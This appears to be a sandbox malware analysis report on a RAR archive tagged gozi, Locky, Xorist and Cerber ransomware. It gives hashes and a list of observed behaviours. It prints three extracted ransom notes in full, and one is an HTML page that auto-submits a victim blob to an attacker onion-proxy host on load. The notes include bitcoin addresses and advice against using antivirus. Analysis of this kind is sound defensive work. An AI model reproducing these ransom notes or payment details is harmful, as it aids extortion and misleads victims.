gozi

Sharing

General

Target

socky of cum.rar
Size

37.8MB
Sample

241112-x6e7qsykcw
MD5

8fc7a13c4492fd5d146f25b726a8ea78
SHA1

77a02370582eeaec4731dea65f6848715d7ccce6
SHA256

09c91862d6e40c74f6edc233440b5f691d498ede6fb00bb43d309ca24e4e67b9
SHA512

9605cb354f327becc3e75c403184befc91db568a0ccf79845cf8813fca3bbf693797f53189980873a1c0c2004ae1671796c8a662e2965b4d3ad2186d4b8398c9
SSDEEP

786432:zd24gc/EkZ/6GN/VM7xK9z13/ID6izYHYX/xQiTNse8fYUv11Kb7u6WqS2:J249/nxN/67k9z13/IDZkWQiTNgAUdo5

Score

10^/10

Malware Config

Extracted

Family

gozi

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note

<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="fJjtX54GAACgBgAAF6DOgL61ZgkfNcExMa9SiVnXHl2uKpWOfQTqTQqhUsZH2R46Ioa8h3vxbtc4WmWm9Oo5xChEWQnUSCy/+3NsQEYvUkqOctBFihhj3PsRxQA5NpS34U5gmvcOpb/KzW2rPHHHyZM5mSEb7AnZOuHQL3b7IWhIayHyVw4EYzUiGP+doxE3ino+fAKHHzaurD9y3ewN2f+1uZoXaq3CUcRDyQHyBv/GlDN9fmMP7Dqysc4ywMGVaTRs94Ygr58gjX+NZuXmdjr4sN0g9RqDJPbEy+yD3RTvEaHqpcZ5/BgyjDcYfVJCtlRjcNt/zVcibUApFRMRU8pGwsenMqj70cwNIbQbXo7zJHX1kT50rxZnVH4ZFX8qRdt7COAoIRm+6sickivAhZ6zEPj/FOFKHejVIR/NFKUQwxhcFLjoptDbArzuUUE4AFzfpJcnOmMkpGphxwimz0my+wkLmqm/ZYngaCNg8uO6WC/RoIeIkX9L1AKVInm4GK91DP9vMV5ry+J8rNigDb/NUrvfAtQ6jp5NR+La69T96Ihey5ZeCSdrEIWRrFfuQ5U20YJPEbDlnqpOkK68xtMCqCvivZaVDuLfJTLtHvoJNsPSpwdJnfqDh517F3Kv31TjbAmoiF+O9MkTbGtboKafnFLNl/WXp/3IAoLZGqsf6GPP4u7Y2X0M04k2w9h4PqcaiaSHA0/6JFpsoKYhrEsLLaOb39vXvMoLsyG9pUjBAlT0orGlYyD2aSs29ag7ckm7Oxcn+Wxx7pphQbm+Y+7/i/wwXtOAS14YOfd1N7wHtEaAGa6525n7n70/gFsGBPrnT7NJ4rVn2VuAiIxdGWf4lOYKG6SPM++YR/hg2SHft5q5LZ6vYV54bHP4WbsAUp0uc5WdaJUabw1oI1alHHMQ97IWLW61nmKWTTxQKyyhwVjN32MFNaJV8baE+BlEwzQutPb4vOSi8c//9AIMkzsklalu0eTOlMjGPTmOELSoaLjLwXpLqbw13+YiFXTSF1pXlnKi9LNNJdQrTEw57bCZdJmnz9NoK9te9JnE6BrVki9mtPDSDb9LxEZKDLaklxUbb0sbl6OE+NIDDsRJDy0Jf7dmSshod71tobdRNScZLBR40WyLRB/MrbR1lGZFJmdibRTrag6Hvl8nWXHVa8DGbj3tkQkfC4SD+8Dgol7bnOQfTHz4lQkaGNho+CubXEL9Da0mvya9km3xoZ893KspsDfh/jX1yiUzGfsw3Vq9W7LgSWU3jsNihWRQU/4zW4NnA3hDk156361PvE4+Y83FyCX6C0iTL+xRgQaeBY8vXLt2bXZdV1q+tsARWc2P/myquwSBtAhzRDazjcKPdHbXoKuauEAgUrL96EMZWlwLTwTY1HMlz7zvdq4llgzYwH49G8RQEpYbldP3sTazVjjMZzwedbrTAzqTlKOelg4BkvTfT2F1CbvnTlDv8mA5sUBVa40Hn+vXlyc3NFlJtqWtJDx3F/WivEM4qpBCVbV6273iK6FADcJ3JyswNy7onUE5ktLfOM7lYMDV8Ziuzs5Y4CqSf7dhFwGmVGOjSLzzWiVsJdnd0UAAITAHL5zMabk/Ybp89eis29VELXA7fzyRTMj0xaAiski66PbI1Zx2qyvJMpM5xwNMonFRpN6WCFGqomDoSIDPjDJB/LAq6w5sXxj8S+QFKVLt4l977yaLzm5GUhO3VLN+Bq+95A8bssbiqG/BAHC/pcTZxF3GvrmOANJ+d7aqO4G2TNm6/bFfj2Vmy3DAvDeClLFN/qHs0buiHktitq96w8sAiNcNfxdeiUo3gAOdRbOnA/znnLe20mndnZQQKV7GUlGFZPr/ay/fc5qDC8JYHLTeU7UaIEBLWeDJDE1v52NSmhPpBjgL/Mwjervy2yTxj+ikuEfHok7FkqTPso6Qj65PvUngpn50l7XbRaOddy0t1NdfnmW5JBOVl2PBxTjfvIgfVXD5J52LW2qnBCmvxq0WdaJVSLVRzXSR8KYWxBqFnkREnvRrbZ6EJkRK1rdeGlGNTzBzc2rL9P2K7arA94Zgkjc+Aw12+M6ECayLIXsuOkYfcagBLVb+E+7t5fnGJA51y1WoQDvEOoN+LVQZQ3YVOsBXRmg5iwHqTBuMUfHIyOTptWLytkST9QmzMEg/QeTrI1CZS7zHbWEvw0GCWP+0KCF7zNllSJe0wHlVpGLaX9a7H6j44p5hNERf9s1Xrfxai5zNzMzjp8Votv/7tv8m6RKfR7G/eSQfRZrRY2t2WyeGlCCWATaTCaduc5UO40IY7cOALPXTGHSm/kwQS3jZcMRpdJfbIsK4EcNsTcz1AwC9x7e3zX2aS9uGt2eip9Cs5shMf+SBtqLfeUlx0TjdJY4IO7x1zmF/F+SvErykjgbC5ckcslHeXhUXTT9fFnkMR7gytNByWjg/xy2uZFFPQvQfrGXlQtIvHMENh6g2FXis5jwYbl5eVv11u++HHW2IB4fgmGSWi6K+NokO5WIw6Vr8dhwUpgisMKKUPT0cb26ANLrzxyiB5ghlSbd+T5bi6cJZG6sBS3YjgQxJzI3hEQsa86FcckMINs3DspmYEbQOtoUHT6BrJ0Rit/05aIyQu7POe81qNz6BF4meRBY61ljDBFPn3ZpguzCRrxvYR6GaqDRgDBivk1tHItoPGNh0X5m4ARvghzUcR8pc3O/QJOpyvv3QMIBX/SNtn/F15YfIrekmty9kv3dG1ooRphQ3CKnZYcL2lseuZ6nQeYqG9ajwB8pzkBo9VNu2LTjBhxijYw4CyuKAgR8KlxAjt3LgsoPQk74FgncMgMbx4engPCQ68sWFWeqIuQmgOY3ZOaDh9AT/n4UyW4x8NvjMzQj53HjTRHgof7HU8MY41eeQX3smywbP/Cy/fDFrCvJ2m94vRGXyB30qnJEuBLnVsJPzXLpEwZQFKGrZwBT2aTgG7VJ8pS/nh8uH2zgrRlitoMSfwQd5O/8GbdKEFE39P8DH1oJmbvJ8YSx718xE7UKPpvBhwaCrpFkbZwyVFMa3jFSLqr7XJIDIUxpLFFL3Ug2kfFlo3G/TizU8TsKvTCrmJn67+XqELpjeYZ1panveFyNxIRRiJjtHse4Ng0bHeUMzPlLXIcHMU2c0LfdwpuYwtlcK65yfaYGBHs07QrvWIy1YeUIlQN3axv9kbBVYxgkj6jaPeZF0QKL8U7fAVYL/lFGgWINS9uOH3pU+sVMG4CQd6cpj+wXY7fVoTY/g+DVEyBjjNhad1i2Xf2DSeZbgxyeyTI/wqDOvGdsOyrlSA5z0YyVTc87ndr8AJ5o1z9Kq5nWD4Zb99xSjMXxeyZaw5thnbHqnqVnJcPa2gMaJiHNPh6ulZh2n+ZpDQGQV04BZfrP9zGuso51yjQlXod4YEYdE4em1HN1u6mrwkHFQakQ2RuuAWCwVbznZX9L72o/m2HyDZDzvvno8znos2vJpfMe3sUY+EmOg/UqdxkNf4Wg4ZE9HHECUB5TCYMhQIxBWER+4BkOX1M42sdumRorDKmLsU3S/F+ccMOL/73jmd2I/qbm30P1Otav6Bj00yc2Ny6SJYL4lxsnhu1/hWaGSExWvZvkoI0tqKunmzpSA0tszef3ZEnwqhEmNQmbXhxbtngUV653ycphaNvABGdlG6zxLSHcVkr5UCeocds586AHqyk4st0R7kRo0E13THs2vZgH4TqV5oV2C51j+zvQb4vAo/IA9w+JR/LzPCVeK9w+pJP/PGMJcaHRURGgLYMH1IAjP+UGtkPwzGoHcC85k30VmoxXrATtdLjP+3q81NLgj7vYCgn5b+6xAgSCq5Z+RuqlSgoiOnlmBEA=="> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/PIDEURYY_8D07C999FB33355B6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/PIDEURYY_8D07C999FB33355B6522DF69/">http://lockerrwhuaf2jjx.onion.sx/PIDEURYY_8D07C999FB33355B6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/PIDEURYY_8D07C999FB33355B6522DF69/">http://lockerrwhuaf2jjx.onion.link/PIDEURYY_8D07C999FB33355B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/PIDEURYY_8D07C999FB33355B6522DF69/">https://lockerrwhuaf2jjx.onion.rip/PIDEURYY_8D07C999FB33355B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/PIDEURYY_8D07C999FB33355B6522DF69/">https://lockerrwhuaf2jjx.onion.to/PIDEURYY_8D07C999FB33355B6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

C:\MSOCache\All Users\HOW DECRIPT FILES.hta

Ransom Note

<html> <head> <meta charset = 'windows-1251'> <title> HOW TO DECRYPT YOUR FILES</title> <HTA:APPLICATION ICON = 'mstsc.exe' SINGLEINSTANCE = 'yes'> <script language = 'JScript'> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type = 'text/css'> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background-color: #C1AB8F; } .bold { font-weight: bold; } .xx { border: 1px dashed #000; background: #E3D5F1; } .mark { background: #D0D0E8; padding: 2px 5px; } .header { font-size: 30px; height: 50px; line-height: 50px; font-weight: bold; border-bottom: 10px solid #D0D0E8; } .info { background: #D0D0E8; border-left: 10px solid #00008B; } .alert { background: #FFE4E4; border-left: 10px solid #FF0000; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note.title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note.mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } </style> </head> <body> <div class='header'>Your files are encrypted!</div> <div class='note private'> <div class='title'>Your personal ID</div> <pre>NKFMP6I1KBDO43YRWRWR2AZ9QH27PDPH6J8K94W2</pre> </div> <div class='bold'> <div align = 'left'> Discovered a serious vulnerability in your network security. </div> </div> <div class='bold'>No data was stolen and no one will be able to do it while they are encrypted.</div> <div class='bold'>For you we have automatic decryptor and instructions for remediation.</div> <div> <h2 align = 'left' > How to get the automatic decryptor:</h2> <div class='bold' align='left'>1) 0.14 BTC</div> <div class='note xx'> <div align = 'left' > </div> <div align='left'> <strong> &nbsp Buy BTC on one of these sites:</strong> </div> <div align = 'left'> <ol> <li><strong><a href='https://localbitcoins.com'>https://localbitcoins.com</a></strong></li> <li><strong><a href = 'https://www.coinbase.com' > https://www.coinbase.com</a></strong></li> <li><strong><a href = 'https://xchange.cc' > https://xchange.cc</a></strong></li> </ol> </div> <div align = 'left'> <div class='bold' align='left'> &nbsp bitcoin adress for pay:<br> </div> </div> <div class='bold' align='left'> &nbsp 14vo2jGKGemxwWKySqPKJ2kTh4MoboqAbG</div> <div align = 'left' ><strong> &nbsp Send 0.14 BTC</strong></div> </div> <div> </div> <div class='bold'><p>2) Send screenshot of payment to<span class='mark'>[email protected]</span>. In the letter include your personal ID(look at the beginning of this document).</p> </div> <div class='bold'> <p>3) You will receive automatic decryptor and all files will be restored</p> </div> <div><p>* To be sure in getting the decryption, you can send one file(less than 10MB) to<span class='mark'>[email protected]</span> In the letter include your personal ID(look at the beginning of this document). But this action will increase the cost of the automatic decryptor on 0.01 btc... </p> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul><li>No Payment = No decryption</li> <li>You really get the decryptor after payment</li> <li>Do not attempt to remove the program or run the anti-virus tools</li> <li>Attempts to self-decrypting files will result in the loss of your data</li> <li>Decoders other users are not compatible with your data, because each user's unique encryption key</li> <li>If you can't send a message, try to write with the other e-mail address, for example register mail.india.com </li> </ul> </div> </body> </html>

Emails

class='mark'>[email protected]</span>

URLs

https://xchange.cc

https://xchange.cc</a></strong></li>

Extracted

Path

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

Ransom Note

YOUR SYSTEM IS LOCKED AND ALL YOUR IMPORTANT DATA HAS BEEN ENCRYPTED. DON'T WORRY YOUR FILES ARE SAFE. TO RETURN ALL TO NORMALLY YOU MUST BUY THE CERBER DECRYPTOR PROGRAM. PAYMENTS ARE ACCEPTED ONLY THROUGH THE BITCOIN NETWORK. YOU CAN GET THEM VIA ATM MACHINE OR ONLINE https://coinatmradar.com/ (find a ATM) https://www.localbitcoins.com/ (buy instantly online any country) THE PRICE FOR DECRYPTOR SOFTWARE IS 0.8 BTC BTC ADRESS : 3KxEZKjS4ifAHhX2o1fq9tERkAshSgA4hg (where you need to make the payment) VERRY IMPORTANT ! DO NOT TRY TO SCAN WITH ANTIVIRUS YOU RISK LOSING YOUR DATA . ANTIVIRUSES ONLY DESTROY THE ENCRYPTED DATA , THEY DO NOT KNOW THE ALGORITH WITH WICH THE ENTIRE SYSTEM WAS ENCRYPTED. THE ONLY WAY TO DECRYPT YOUR SYSTEM AND RETURN TO NORMAL IS TO BUY THE ORIGINAL DECRYPTOR SOFTWARE. For more information : [email protected] (24/7) Subject : SYSTEM-LOCKED-ID: 10191895

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Targets

Gozi family

Drops startup file

Executes dropped EXE

UPX packed file

Boot or Logon Autostart Execution: Active Setup

Locky (Lukitus variant)

Locky_lukitus family

Deletes itself

Indicator Removal: File Deletion

Sets desktop wallpaper using registry

Drops file in Drivers directory

Manipulates Digital Signatures

Credentials from Password Stores: Windows Credential Manager

Drops startup file

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Drops autorun.inf file

Drops file in System32 directory

UAC bypass

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Drops desktop.ini file(s)

Enumerates connected drives

Drops autorun.inf file

Drops file in System32 directory

Sets desktop wallpaper using registry

Detected Xorist Ransomware

Xorist Ransomware

Xorist family

Renames multiple (6057) files with added filename extension

Drops file in Drivers directory

Manipulates Digital Signatures

Drops startup file

Reads user/profile data of web browsers

Adds Run key to start application

Drops desktop.ini file(s)

Drops autorun.inf file

Drops file in System32 directory

Sets desktop wallpaper using registry

Deletes shadow copies

Renames multiple (8633) files with added filename extension

Clears Network RDP Connection History and Configurations

Deletes itself

Reads user/profile data of web browsers

Adds Run key to start application

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Deletes itself

Process spawned unexpected child process

Deletes shadow copies

Modifies boot configuration data using bcdedit

Checks computer location settings

Deletes itself

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

Drops file in System32 directory

Sets desktop wallpaper using registry

Deletes itself

Windows security bypass

Disables taskbar notifications via registry modification

Deletes itself

Executes dropped EXE

Loads dropped DLL

Windows security modification

Adds Run key to start application

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory